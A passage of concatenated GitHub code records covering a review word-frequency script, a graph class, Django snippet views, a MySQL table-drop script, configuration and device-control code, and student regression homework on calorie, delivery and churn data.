'制作-导演', '制作-选景', '制作-制作',\r\n '主题-风格', '主题-题材内容', '主题-主题']\r\n#先把词典的路径放进一个列表dictionary,再对应词典名字再建一个列表words,创建列表times对应每个词典中在评论文件中出现的次数\r\n\r\n#可优化之处:可以搭建一个函数其功能为:获取'D:/作业/词典'下所有子目录中的文件和路径,对应建以上列表,但是鉴于文件路径获取等方法尚不会暂不写出\r\n\r\nimport re #正则\r\nfile = open(comment_dir, 'r', encoding='UTF-8') #打开评论文件\r\ncomment=file.read() #读取评论文件\r\nfor i in range(26): #将26个词典中的标注词和评论文件所有的评论进行匹配,若匹配成功,对应的标注词的分类的次数就加匹配出的个数\r\n if i==21:\r\n dicfile = open(dictionary[i], 'r')\r\n else:\r\n dicfile = open(dictionary[i], 'r', encoding='UTF-8')\r\n #因为测试出有一个词典文件编码形式是ANSI(测试的代码省略,我暂时是用print和循环测试的),可采取以下方法:\r\n #1.将此文件转换为utf-8\r\n #2.找出文件位置,将对应的路径文件单独打开...\r\n #在此处因为知识有限,采用了第二种方法,同时也导致了这个程序失去了一���性(日后请考虑优化)\r\n for word in dicfile.readlines():\r\n find_result= re.findall(word,comment) #注意正则表达式的search,findall等函数的区别(这样就把find_result变成一个列表可求长度)\r\n times[i]=times[i]+len(find_result)\r\n#print(times)\r\nresult={} #创建一个空的词典\r\nfor i in range(26):\r\n result[words[i]]=times[i] #将词典文件名字和次数对应起来\r\nprint(result) #通过比较次数可得评论的关注点\r\n\r\n\r\n\r\n#最后总结:此程序显然只是针对这几个文件的,没有一般性,也没有封装起来,可是因为对文件的操作函数的不熟悉以及语言的初识,没有能很好的解决这些问题和漏洞。\r\n#1.刚开始,想自己写简单的字符串匹配函数,写了很久,有没有测试成功,最后还是使用了正则表达式,接下来可以研究。\r\n#2.文件的打开也困扰了我很久,没有txt后缀还有编码形式的不同都要花功夫去写程序检测,检测出来还要想出方法解决。\r\n#3.其实还有一个就是到现在也不是很明白什么是关注点?是算关注度百分比还是只要比较出评论最多的几个词?\r\n","repo_name":"PuJes/python-study-1-","sub_path":"python study(1).py","file_name":"python study(1).py","file_ext":"py","file_size_in_byte":4594,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36618810832","text":"class GraphNode():\n def __init__(self, data):\n self.data = data\n\n\nclass GraphWithAdjacencyList():\n #we can assume the graph is undirected\n def __init__(self, AdjacencyList = {}, nodes = []):\n self.AdjacencyList = AdjacencyList\n self.nodes = nodes \n\n\n def findNode(self, key):\n #added additional function to help with finding nodes corresponding to keys\n for i in self.AdjacencyList.keys():\n if i.data == key:\n return i\n\n\n def addNode(self, key):\n #doesn't allow for duplicates\n if key in self.nodes:\n raise ValueError (\"Key already in graph\")\n\n node = GraphNode(key)\n self.AdjacencyList[node] = set()\n self.nodes.append(key)\n\n\n\n def removeNode(self, key):\n if not key in self.nodes:\n raise ValueError (\"Key not in graph\")\n \n del self.AdjacencyList[self.findNode(key)]\n self.nodes.remove(key)\n\n\n\n def addEdge(self, node1, node2):\n if not node1 in self.nodes and not node2 in self.nodes:\n raise ValueError (\"Both nodes are not in graph\")\n\n elif not node1 in self.nodes or not node2 in self.nodes:\n raise ValueError (\"One node is not in graph\")\n\n #Since graph is undirected we add both edges into the adjacency list\n self.AdjacencyList[self.findNode(node1)].add(self.findNode(node2))\n self.AdjacencyList[self.findNode(node2)].add(self.findNode(node1))\n\n\n def removeEdge(self, node1, node2):\n if not node1 in self.nodes and not node2 in self.nodes:\n raise ValueError (\"Both nodes are not in graph\")\n\n elif not node1 in self.nodes or not node2 in self.nodes:\n raise ValueError (\"One node is not in graph\") \n\n #Since graph is undirected we remove both edges from the adjacency list\n self.AdjacencyList[self.findNode(node1)].remove(self.findNode(node2))\n self.AdjacencyList[self.findNode(node2)].remove(self.findNode(node1))\n\n\n def getAdjNodes(self, key):\n if key not in self.nodes:\n raise ValueError (\"Key not in graph\")\n\n else:\n adjacent_nodes = set()\n for node in self.AdjacencyList[self.findNode(key)]:\n adjacent_nodes.add(node.data)\n \n return adjacent_nodes\n\n\nif __name__ == \"__main__\":\n graph = GraphWithAdjacencyList()\n graph.addNode(1)\n graph.addNode(2)\n graph.addNode(3)\n graph.addNode(4)\n\n# 1 - 2\n# | |\n# 3 - 4\n\n graph.addEdge(1, 2)\n graph.addEdge(1, 3)\n graph.addEdge(3, 4)\n graph.addEdge(2, 4)\n\n assert(graph.getAdjNodes(1) == {2, 3})\n assert(graph.getAdjNodes(2) == {1, 4})\n assert(graph.getAdjNodes(3) == {1, 4})\n assert(graph.getAdjNodes(4) == {2, 3})\n\n graph.removeEdge(1, 2)\n graph.removeEdge(1, 3)\n graph.removeEdge(3, 4)\n graph.removeEdge(2, 4)\n\n assert(graph.getAdjNodes(1) == set())\n assert(graph.getAdjNodes(2) == set())\n assert(graph.getAdjNodes(3) == set())\n assert(graph.getAdjNodes(4) == set())\n\n try:\n graph.addNode(1)\n except:\n ValueError\n\n try:\n graph.removeNode(5)\n except:\n ValueError\n\n try:\n graph.getAdjNodes(5)\n except:\n ValueError\n\n try:\n graph.addEdge(5, 1)\n except:\n ValueError\n\n try:\n graph.removeEdge(5, 6)\n except:\n ValueError\n \n \n","repo_name":"ubercareerprep2022/Uber-Career-Prep-Homework-Wassay-Qureshi","sub_path":"Assignment-2/GraphEx1.py","file_name":"GraphEx1.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7679180037","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.http import JsonResponse, HttpResponse\nfrom django.views.decorators.http import require_POST\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.contrib.postgres.search import TrigramSimilarity\nfrom taggit.models import Tag\nfrom .forms import SnippetCreateForm, SearchForm\nfrom .models import Snippet\n\n\nimport redis\nfrom django.conf import settings\n# connect to redis\nr = redis.Redis(host=settings.REDIS_HOST,\n port=settings.REDIS_PORT,\n db=settings.REDIS_DB)\n\n@login_required\ndef snippet_create(request):\n if request.method == 'POST':\n form = SnippetCreateForm(data=request.POST)\n if form.is_valid():\n new_snippet = form.save(commit=False)\n # assign current user to the item\n new_snippet.user = request.user\n new_snippet.save()\n form.save_m2m()\n messages.success(request, 'Snippet added successfully')\n # redirect to new created item detail view\n return redirect(new_snippet.get_absolute_url())\n else:\n form = SnippetCreateForm()\n return render(request, 'snippets/snippet/create.html', {'section': 'snippets', 'form': form})\n\n\ndef snippet_detail(request, id, slug):\n snippet = get_object_or_404(Snippet, id=id, slug=slug)\n total_views = r.incr(f'snippet:{snippet.id}:views')\n # string: language,style,linenos for custom template tag\n snippet_config = f\"{snippet.language},{snippet.style},{snippet.linenos}\"\n return render(request, 'snippets/snippet/detail.html', {'section': 'snippets', 'snippet': snippet,\n 'snippet_config': snippet_config,\n 'total_views': total_views})\n\n\n@login_required\n@require_POST\ndef snippet_like(request):\n snippet_id = request.POST.get('id')\n action = request.POST.get('action')\n if snippet_id and action:\n try:\n snippet = Snippet.objects.get(id=snippet_id)\n if action == 'like':\n snippet.users_like.add(request.user)\n else:\n snippet.users_like.remove(request.user)\n return JsonResponse({'status': 'ok'})\n except:\n pass\n return JsonResponse({'status': 'error'})\n\n\ndef snippet_list(request, tag_slug=None):\n snippets = Snippet.objects.all()\n tag = None\n if tag_slug:\n tag = get_object_or_404(Tag, slug=tag_slug)\n snippets = snippets.filter(tags__in=[tag])\n paginator = Paginator(snippets, 8)\n page = request.GET.get('page')\n snippets_only = request.GET.get('snippets_only')\n try:\n snippets = paginator.page(page)\n except PageNotAnInteger:\n snippets = paginator.page(1)\n except EmptyPage:\n if snippets_only:\n return HttpResponse('')\n snippets = paginator.page(paginator.num_pages)\n if snippets_only:\n return render(request, 'snippets/snippet/list_snippets.html', {'section': 'images', 'snippets': snippets, 'tag': tag})\n return render(request, 'snippets/snippet/list.html', {'section': 'snippets', 'snippets': snippets, 'tag': tag})\n\n\ndef snippet_search(request):\n form = SearchForm()\n query = None\n results = []\n if 'query' in request.GET:\n form = SearchForm(request.GET)\n if form.is_valid():\n query = form.cleaned_data['query']\n results = Snippet.objects.annotate(\n similarity=TrigramSimilarity('title', query),\n ).filter(similarity__gt=0.1).order_by('-similarity')\n return render(request, 'snippets/snippet/search.html', {'form': form, 'query': query, 'results': results})","repo_name":"raj3k/code_snip","sub_path":"snippets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14713121249","text":"from db import new_connection\nfrom mysql.connector import ProgrammingError\n\ndrop_tabela_emails = \"DROP TABLE IF EXISTS emails\"\n\nwith new_connection() as conn:\n try:\n cursor = conn.cursor()\n cursor.execute(drop_tabela_emails)\n except ProgrammingError as e:\n print(f\"Erro: {e.msg}\")\n","repo_name":"wagnerberna/cursos-python","sub_path":"coder_python/Projeto-python-MySQL/04-drop_table_email.py","file_name":"04-drop_table_email.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38103020854","text":"# root directory that contain all vehicle images in nested subdirectories\nroot_data_vehicle = '../../../NANODEGREE/term_1/project_5_vehicle_detection/vehicles'\n\n# root directory that contain all NON-vehicle images in nested subdirectories\nroot_data_non_vehicle = '../../../NANODEGREE/term_1/project_5_vehicle_detection/non-vehicles'\n\n# parameters used in the phase of feature extraction\nfeat_extraction_params = {'resize_h': 64, # resize image height before feat extraction\n 'resize_w': 64, # resize image height before feat extraction\n 'color_space': 'YCrCb', # Can be RGB, HSV, LUV, HLS, YUV, YCrCb\n 'orient': 9, # HOG orientations\n 'pix_per_cell': 8, # HOG pixels per cell\n 'cell_per_block': 2, # HOG cells per block\n 'hog_channel': \"ALL\", # Can be 0, 1, 2, or \"ALL\"\n 'spatial_size': (32, 32), # Spatial binning dimensions\n 'hist_bins': 16, # Number of histogram bins\n 'spatial_feat': True, # Spatial features on or off\n 'hist_feat': True, # Histogram features on or off\n 'hog_feat': True} # HOG features on or off\n\n\n\n\n\n\n\n","repo_name":"ndrplz/self-driving-car","sub_path":"project_5_vehicle_detection/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":2642,"dataset":"github-code","pt":"79"} +{"seq_id":"32055126138","text":"from threading import Thread\nimport os\nimport time\nimport logging\n\nfrom azure.eventhub import EventHubClient, EventPosition, EventHubSharedKeyCredential, EventData\n\nimport examples\nlogger = examples.get_logger(logging.INFO)\n\n\nHOSTNAME = os.environ.get('EVENT_HUB_HOSTNAME') # .servicebus.windows.net\nEVENT_HUB = os.environ.get('EVENT_HUB_NAME')\n\nUSER = os.environ.get('EVENT_HUB_SAS_POLICY')\nKEY = os.environ.get('EVENT_HUB_SAS_KEY')\n\nEVENT_POSITION = EventPosition(\"-1\")\n\n\nclass PartitionConsumerThread(Thread):\n def __init__(self, consumer):\n Thread.__init__(self)\n self.consumer = consumer\n\n def run(self):\n for item in self.consumer:\n print(item)\n\n\nclient = EventHubClient(host=HOSTNAME, event_hub_path=EVENT_HUB, credential=EventHubSharedKeyCredential(USER, KEY),\n network_tracing=False)\nconsumer = client.create_consumer(consumer_group=\"$default\", partition_id=\"0\", event_position=EVENT_POSITION)\nwith consumer:\n thread = PartitionConsumerThread(consumer)\n thread.start()\n thread.join(2) # stop after 2 seconds\n","repo_name":"mccoyp/azure-keyvault-7.3-preview","sub_path":"sdk/eventhub/azure-eventhubs/examples/iterator_receiver.py","file_name":"iterator_receiver.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38107031644","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 15 15:19:44 2021\n@author: Nathan Drouillard\n\"\"\"\n\nimport serial\nimport time\n\n#%% Open the COM port\n\nser = serial.Serial('/dev/ttyUSB_MICRONIX',38400)\n\n#%% Home the stage\n\ndef home():\n\n ser.write(b'1HOM\\r')\n ser.flush()\n time.sleep(1)\n #ser.write(b'1WTM42\\r')\n ser.write(b'1WST\\r')\n time.sleep(1)\n print(\"stopped\")\n ser.flush()\n #isstopped = ser.readline()\n ser.write(b'1ZRO\\r')\n time.sleep(1)\n ser.flush()\n #zeroed = ser.readline()\n print(\"zeroed\")\n\n#%% Setup for feedback loop\n\ndef params():\n min_pos = -1\n max_pos = 1\n\n ser.write(b'1VEL5.0\\r') #set velocity to 5 mm/s\n time.sleep(1)\n ser.flush()\n #velset = ser.readline()\n print(\"velset\")\n\n min_pos_str = \"1TLN\" + str(min_pos) + \"\\r\"\n # ser.write(b'1POS?\\r')\n # ser.write(b'1MVA0\\r')\n min_pos_byt = str.encode(min_pos_str) #encode soft travel limit in the negative direction\n ser.write(min_pos_byt) #write it to the controller\n ser.flush()\n #neglim = ser.readline()\n time.sleep(1)\n print(\"neglim\")\n\n max_pos_str = \"1TLP\" + str(max_pos) + \"\\r\"\n max_pos_byt = str.encode(max_pos_str)\n ser.write(max_pos_byt)\n ser.flush()\n #poslim = ser.readline()\n time.sleep(1)\n print(\"poslim\")\n\n ser.write(b'1EPL1\\r') #ensure the correct encoder polarity for the feedback loop\n ser.flush()\n #polset = ser.readline()\n ser.write(b'1FBK3\\r') #closed loop feedback mode\n ser.flush()\n #fbkset = ser.readline()\n ser.write(b'4DBD5,0\\r') #set closed loop deadband parameters (0 means it will never timeout)\n ser.flush()\n time.sleep(1)\n print(\"Params set\")\n #dbdset = ser.readline()\n\n#%% Move the stage (moves one way, but not back and forth)\n\ndef move():\n\n #home()\n #time.sleep()\n #params()\n for i in range(0,4):\n # ser.write(b'1PGL0\\r') #loop program continuously\n ser.write(b'1MLN\\r') #move to negative limit\n time.sleep(1)\n print(\"moved neg\")\n # ser.write(b'1MVA-2\\r')\n ser.flush()\n ser.write(b'1WST\\r')\n time.sleep(1)\n ser.flush()\n #movedneg = ser.readline()\n #ser.flush()\n #print(movedneg)\n # ser.write(b'1WTM5000\\r') #wait for 5000 ms\n ser.write(b'1MLP\\r') #move to positive limit\n # ser.write(b'1MVA2\\r')\n time.sleep(1)\n ser.flush()\n ser.write(b'1WST\\r')\n time.sleep(1)\n ser.flush()\n #movedpos = ser.readline()\n #ser.flush()\n print(\"movedpos\")\n\n#%% Close COM port (important)\n\ndef close():\n\n ser.close()\n\nhome()\nparams()\n#time.sleep(1)\nmove()\n#close()\n","repo_name":"ndrouillard/FTIR-Notebook","sub_path":"micronix_functions_final.py","file_name":"micronix_functions_final.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7363010975","text":"import pandas as pd\r\nimport numpy as np\r\ndata = pd.read_csv(\"~/documents/calories_consumed.csv\")\r\ndata\r\ndata.info()\r\ndata.describe()\r\ndata.columns\r\n# measure of central tendency or first moment business decisions\r\ndata.mean()\r\ndata.median()\r\ndata.mode()\r\n## measure of despersion or second business moment decisions\r\ndata.std()\r\ndata.var()\r\n# third moment business decisions\r\ndata.skew()\r\n# fourth moment business decisions\r\ndata.kurt()\r\nimport matplotlib.pyplot as plt\r\n\r\nplt.bar(height = data.weight, x = np.arange(1,15,1))\r\nplt.bar(height = data.calories, x= np.arange(1,15,1))\r\n\r\nplt.boxplot(data.weight) ## we have no outliers\r\nplt.boxplot(data.calories) # we have no outliers\r\n\r\nplt.hist(data.weight) # the distribution is right skewed\r\nplt.hist(data.calories)# right skewed distribution\r\nimport statsmodels.api as sm\r\nsm.qqplot(data)\r\nsm.qqplot(data.weight)\r\nsm.qqplot(data.calories)\r\n# By visualizing histogram,boxplot,qqplots\r\n# we can say the data is normally distributed .\r\nplt.scatter(x = data.weight, y = data.calories, color = 'black')\r\n# correlation \r\nnp.corrcoef(data.weight, data.calories)\r\n# if we have|r| > 0.85, then we can say the co-relation is strong\r\n\r\n# also we can say by observing the above scatter plot and correlation\r\n#The data is 1. linearly distributed\r\n #2. positively distributed\r\n #3.strong coorelation\r\n \r\ncov_var = np.cov(data.weight,data.calories)\r\ncov_var\r\n\r\n# now we are all set build a model\r\nimport statsmodels.formula.api as smf\r\nmodel = smf.ols(\"calories~weight\", data = data).fit()\r\nmodel.summary()\r\n\r\npred1 = model.predict(pd.DataFrame(data[\"weight\"]))\r\n\r\n# regression line\r\nplt.scatter(data.weight, data.calories)\r\nplt.plot(data.weight,pred1,\"r\")\r\nplt.legend(['Predicted line, Observed data'])\r\nplt.show()\r\n\r\n## error calculation\r\nres1 = data.calories - pred1\r\nres_sqr1 = (res1*res1)\r\nmse1 = np.mean(res_sqr1)\r\nrmse1 = np.sqrt(mse1)\r\nrmse1 ## we got an error = 232.833\r\n\r\n##### building a model on transformed data by using log transformations\r\n# x = log(weight); y = calories\r\nplt.scatter(x = np.log(data['weight']), y = data['calories'], color = 'blue')\r\nnp.corrcoef(np.log(data.weight),data.calories)\r\n\r\nmodel2 = smf.ols('calories~np.log(weight)',data = data).fit()\r\nmodel2.summary()\r\n\r\npred2 = model2.predict(pd.DataFrame(data['weight']))\r\n\r\n\r\n# regression line\r\nplt.scatter(np.log(data.weight),data.calories)\r\nplt.plot(np.log(data.weight), pred2, 'r')\r\nplt.legend('Predict line', 'Observed data')\r\nplt.show()\r\n\r\n## error calculation\r\nres2 = data.calories - pred2\r\nres_sqr2 = (res2 * res2)\r\nmse2 = np.mean(res_sqr2)\r\nrmse2 = np.sqrt(mse2)\r\nrmse2 # we have an error 253.55\r\n\r\n## exponential transformation\r\n# x = weight; y = log(calories)\r\nplt.scatter(x = data['weight'], y = np.log(data['calories']), color = 'orange')\r\nnp.corrcoef(data.calories, data.weight)\r\n\r\nmodel3 = smf.ols('np.log(calories)~weight',data = data).fit()\r\nmodel3.summary()\r\n\r\npred3 = model3.predict(pd.DataFrame(data['weight']))\r\npred3_at = np.exp(pred3)\r\npred3_at\r\n\r\n## regression line\r\nplt.scatter(data.weight, np.log(data.calories))\r\nplt.plot(data.weight, pred3, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n## error calculation\r\nrse3 = data.calories - pred3_at\r\nrse_sqr3 = (rse3 * rse3)\r\nmse3 = np.mean(rse_sqr3)\r\nrmse3 = np.sqrt(mse3)\r\nrmse3 ### 272.420\r\n\r\n#### polynomial transformations\r\n## x = weight; x^2 =(weight * weight); y = log(calories)\r\nmodel4 = smf.ols('np.log(calories) ~ weight+I(weight*weight)',data = data).fit()\r\nmodel4.summary()\r\npred4 = model.predict(pd.DataFrame(data))\r\npred4_at = np.exp(pred4)\r\npred4_at\r\n\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_reg = PolynomialFeatures(degree = 2)\r\nx = data.iloc[:, 0:1].values\r\nx_poly = poly_reg.fit_transform(x)\r\nx_poly\r\n\r\nplt.scatter(data.weight, np.log(data.calories))\r\nplt.plot(x, pred4, color = 'green')\r\nplt.legend('Predicted line','Observed data')\r\nplt.show()\r\n\r\n### error calculation\r\nrse4 = data.calories- pred4_at\r\nrse_sqr4 = (rse4 * rse4)\r\nmse4 = np.mean(rse_sqr4)\r\nrmse4 = np.sqrt(mse4)\r\nrmse4\r\n\r\n## for choosing best model\r\nnew_data = {'model':pd.Series([\"SLR\",\"log model\",\"exp model\",\"poly model\"]),\"RMSE\":pd.Series([rmse1,rmse2,rmse3,rmse4])}\r\ntable_rmse = pd.DataFrame(new_data)\r\ntable_rmse\r\n\r\n############################## the best model\r\nfrom sklearn.model_selection import train_test_split\r\ntrain,test = train_test_split(data, test_size = 0.2)\r\n\r\nfinal_model = smf.ols('calories~weight',data= train).fit()\r\nfinal_model.summary()\r\n\r\n## predict on test_data\r\ntest_pred = final_model.predict(pd.DataFrame(test))\r\npred_test_calories = np.exp(test_pred)\r\npred_test_calories\r\n\r\n#### model evaluation on test data\r\ntest_res = test.calories- pred_test_calories\r\ntest_sqrs = (test_res * test_res)\r\ntest_mse = np.mean(test_sqrs)\r\ntest_rmse = np.sqrt(test_mse)\r\ntest_rmse\r\n\r\n### prediction on train data\r\ntrain_pred = final_model.predict(pd.DataFrame(train))\r\npred_train_calories = np.exp(train_pred)\r\npred_train_calories\r\n\r\n##### model evaluation on train data\r\ntrain_res = train.calories - pred_train_calories\r\ntrain_sqrs = (train_res * train_res)\r\ntrain_mse = np.mean(train_sqrs)\r\ntrain_rmse = np.sqrt(train_mse)\r\ntrain_rmse\r\n\r\n\r\n\r\n# 2. A food delivery service recorded the data of delivery time taken and\r\n# the time taken for the deliveries to be sorted by the restaurants in \r\n# order to improve their delivery services. Approach – \r\n# A Simple Linear regression model needs to be built with target\r\n #variable ‘Delivery.Time’. Apply necessary transformations and\r\n #record the RMSE values, Correlation coefficient values for different \r\n #transformation models. \r\n \r\nimport pandas as pd\r\nimport numpy as np\r\nmy_data = pd.read_csv('~/documents/delivery_time.csv')\r\nmy_data\r\nmy_data.describe()\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.boxplot(my_data)\r\nplt.boxplot(my_data.delivery)\r\nplt.boxplot(my_data.sorting)\r\n\r\nplt.scatter(x = my_data.delivery, y = my_data.sorting, color = \"black\")\r\nplt.hist(my_data.delivery)\r\nplt.hist(my_data.sorting)\r\n\r\nimport statsmodels.api as sm\r\nsm.qqplot(my_data.delivery)\r\nsm.qqplot(my_data.sorting)\r\n ##### by observing the above plots we can say that data is normally distributed\r\n ## coorelation \r\nnp.corrcoef(my_data.delivery, my_data.sorting)\r\n\r\n# covariation\r\ncov_vr = np.cov(my_data.delivery, my_data.sorting)\r\ncov_vr\r\n\r\n### model building\r\nimport statsmodels.formula.api as smf\r\n\r\nmod1 = smf.ols(\"delivery~sorting\",data = my_data).fit()\r\nmod1.summary()\r\npred1 = mod1.predict(pd.DataFrame(my_data['sorting']))\r\n\r\n### regression line\r\nplt.scatter(my_data.sorting, my_data.delivery)\r\nplt.plot(my_data.sorting, pred1,\"r\")\r\nplt.legend(\"Predicted line\", \"Observed data\")\r\nplt.show()\r\n\r\n## error calculation \r\nrse1 = my_data.delivery - pred1\r\nrse_sqr1 = (rse1 * rse1)\r\nmse1 = np.mean(rse_sqr1)\r\nrmse1 = np.sqrt(mse1)\r\nrmse1 #### 2.79\r\n\r\n### model building on transformed data\r\n## x = log(sorting); y = delivery\r\nplt.scatter(x = my_data.delivery, y = np.log(my_data.sorting))\r\nnp.corrcoef(my_data.delivery, np.log(my_data.sorting))\r\n\r\n\r\nmod2 = smf.ols(\"delivery~np.log(sorting)\",data = my_data).fit()\r\nmod2.summary()\r\npred2 = mod2.predict(pd.DataFrame(my_data[\"sorting\"]))\r\n### regression line\r\nplt.scatter(np.log(my_data.sorting),my_data.delivery)\r\nplt.plot(np.log(my_data.sorting),pred2, \"r\")\r\nplt.legend(\"Predicted line\",\"Observed data\")\r\nplt.show()\r\n\r\n### error calculation\r\nrse2 = np.log(my_data.sorting) - pred2\r\nrse_sqr2 = (rse2 * rse2)\r\nmse2 = np.mean(rse_sqr2)\r\nrmse2 = np.sqrt(mse2)\r\nrmse2 ### 4.63\r\n\r\n### model building on exponential transformations\r\n# x = sorting ; y = log(delivery)\r\nplt.scatter(x = my_data.sorting, y = np.log(my_data.delivery))\r\nnp.corrcoef(my_data.sorting, y = np.log(my_data.delivery))\r\n\r\nmod3 = smf.ols(\"np.log(delivery)~sorting\",data = my_data).fit()\r\nmod3.summary()\r\npred3 = mod3.predict(pd.DataFrame(my_data['sorting']))\r\npred3_at = np.exp(pred3)\r\npred3_at\r\n\r\n### regression line\r\nplt.scatter(my_data.sorting, np.log(my_data.delivery))\r\nplt.plot(my_data.sorting, pred3, \"r\")\r\nplt.legend('Predicted line',\"Observed data\")\r\nplt.show()\r\n\r\n### error calculation\r\nrse3 = my_data.delivery - pred3_at\r\nrse_sqr3 = (rse3 * rse3)\r\nmse3 = np.mean(rse_sqr3)\r\nrmse3 = np.sqrt(mse3)\r\nrmse3 ### 2.94\r\n\r\n##### polynomial transformation\r\n## x = sorting; x^2 = (sorting*sorting); y = log(delivery)\r\nmod4 = smf.ols(\"np.log(delivery) ~ sorting + I(sorting*sorting)\",data = my_data).fit()\r\nmod4.summary()\r\n\r\npred4 = mod4.predict(pd.DataFrame(my_data))\r\npred4_at = np.exp(pred4)\r\npred4_at\r\n\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_reg = PolynomialFeatures(degree = 2)\r\nx = my_data.iloc[:, 0:1].values\r\nx_poly = poly_reg.fit_transform(x)\r\n\r\nplt.scatter(my_data.sorting, np.log(my_data.delivery))\r\nplt.plot(x, pred4, \"r\")\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n## error calculation\r\nrse4 = my_data.delivery - pred4_at\r\nrse_sqr4 = (rse4 * rse4)\r\nmse4 = np.mean(rse_sqr4)\r\nrmse4 = np.sqrt(mse4)\r\nrmse4\r\n\r\n#### choosing best model\r\nend_data = {\"Model\": pd.Series([\"SLR\",\"log model\", \"exponential\",\"poly\"]), \"RMSE\": pd.Series([rmse1, rmse2, rmse3, rmse4])}\r\ntable_rmse = pd.DataFrame(end_data)\r\ntable_rmse\r\n\r\n### the best model\r\nfrom sklearn.model_selection import train_test_split\r\n\r\ntrain,test = train_test_split(my_data, test_size = 0.2)\r\nfinalmodel = smf.ols('delivery~sorting',data = my_data).fit()\r\nfinalmodel.summary()\r\n\r\n## predict on test data\r\ntest_pred = finalmodel.predict(pd.DataFrame(test))\r\npred_test_delivery = np.exp(test_pred)\r\npred_test_delivery\r\n\r\n### model evaluation on test data\r\ntest_rse = test.delivery - test_pred\r\ntest_rse_sqr = (test_rse * test_rse)\r\ntest_mse = np.mean(test_rse_sqr)\r\ntest_rmse = np.sqrt(test_mse)\r\ntest_rmse ## 1.5\r\n\r\n## prediction on train data\r\ntrain_pred = finalmodel.predict(pd.DataFrame(train))\r\npred_train_del = np.exp(train_pred)\r\npred_train_del\r\n\r\n## model evaluation train data\r\ntrain_rse = train.delivery - train_pred\r\ntrain_rse_sqr = (train_rse * train_rse)\r\ntrain_mse = np.mean(train_rse_sqr)\r\ntrain_rmse = np.sqrt(train_mse)\r\ntrain_rmse # 3.08\r\n\r\n\r\n#3.) A certain organization wanted an early estimate of their employee\r\n#churn out rate. So, the HR department came up with data regarding the \r\n#employee’s salary hike and churn out rate for a financial year.\r\n#The analytics team will have to perform a deep analysis and predict an\r\n#estimate of employee churn and present the statistics. Approach\r\n#–A Simple Linear regression model needs to be built with target variable\r\n#‘Churn_out_rate’. Apply necessary transformations and record the RMSE values\r\n#, Correlation coefficient values for different transformation.\r\n\r\nimport pandas as pd \r\nimport numpy as np\r\n\r\ninfo = pd.read_csv('~/documents/emp_data.csv')\r\ninfo\r\ninfo.describe()\r\ninfo.mean()\r\ninfo.median()\r\ninfo.mode()\r\ninfo.std()\r\ninfo.var()\r\ninfo.skew()\r\ninfo.kurt()\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\n### constructing boxplot for finding outliers\r\nplt.boxplot(info)\r\nplt.boxplot(info.salary)\r\nplt.boxplot(info.churn) ## we have no outliers\r\n\r\n### check the data is normally distributed or not\r\nimport statsmodels.api as sm\r\n\r\nsm.qqplot(info.salary)\r\nsm.qqplot(info.churn)\r\n\r\n## histogram\r\nplt.hist(info.salary)## right skewed\r\nplt.hist(info.churn)## right skewed distribution\r\n\r\n### Barchart\r\nplt.bar(height = info.salary, x= np.arange(1,11,1))\r\nplt.bar(height = info.churn, x= np.arange(1,11,1))\r\n\r\n## scatter plot\r\nplt.scatter(x = info['salary'], y = info['churn'], color = 'red')\r\n\r\n### correlation\r\nnp.corrcoef(info.salary, info.churn)\r\n\r\n## covariance\r\ncov_var = np.cov(info.salary,info.churn)\r\ncov_var\r\n\r\nimport statsmodels.formula.api as smf\r\nmodel1 = smf.ols('churn~salary',data= info).fit()\r\nmodel1.summary()\r\npred1 = model1.predict(pd.DataFrame(info['salary']))\r\n\r\n## regression line\r\nplt.scatter(info.salary, info.churn)\r\nplt.plot(info.salary, pred1, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n## error calculation\r\nrse1 = info.churn - pred1\r\nrse_sqr = (rse1 * rse1)\r\nmse1 = np.mean(rse_sqr)\r\nrmse1 = np.sqrt(mse1)\r\nrmse1 ## 3.997\r\n\r\n##### model building on log transformed data\r\n# x = log(salary); y = churn\r\nmodel2 = smf.ols('churn~np.log(salary)',data = info).fit()\r\nmodel2.summary()\r\n\r\npred2 = model2.predict(pd.DataFrame(info['salary']))\r\n\r\n### regression line\r\nplt.scatter(np.log(info.salary), info.churn)\r\nplt.plot(np.log(info.salary), pred2, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n### error calculation\r\nrse2 = info.churn - pred2\r\nrse_sqr2 = (rse2 * rse2)\r\nmse2 = np.mean(rse_sqr2)\r\nrmse2 = np.sqrt(mse2)\r\nrmse2 ### 3.786\r\n\r\n### model building on exponential data\r\n# x = salary; y = log(churn)\r\nmodel3 = smf.ols('np.log(churn)~salary',data = info).fit()\r\nmodel3.summary()\r\npred3 = model3.predict(pd.DataFrame(info['salary']))\r\npred3_at = np.exp(pred3)\r\npred3_at\r\n\r\n### regression line\r\nplt.scatter(info.salary, np.log(info.churn))\r\nplt.plot(info.salary, pred3, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n##### Error calculation\r\nrse3 = info.churn - pred3_at\r\nrse_sqr3 = 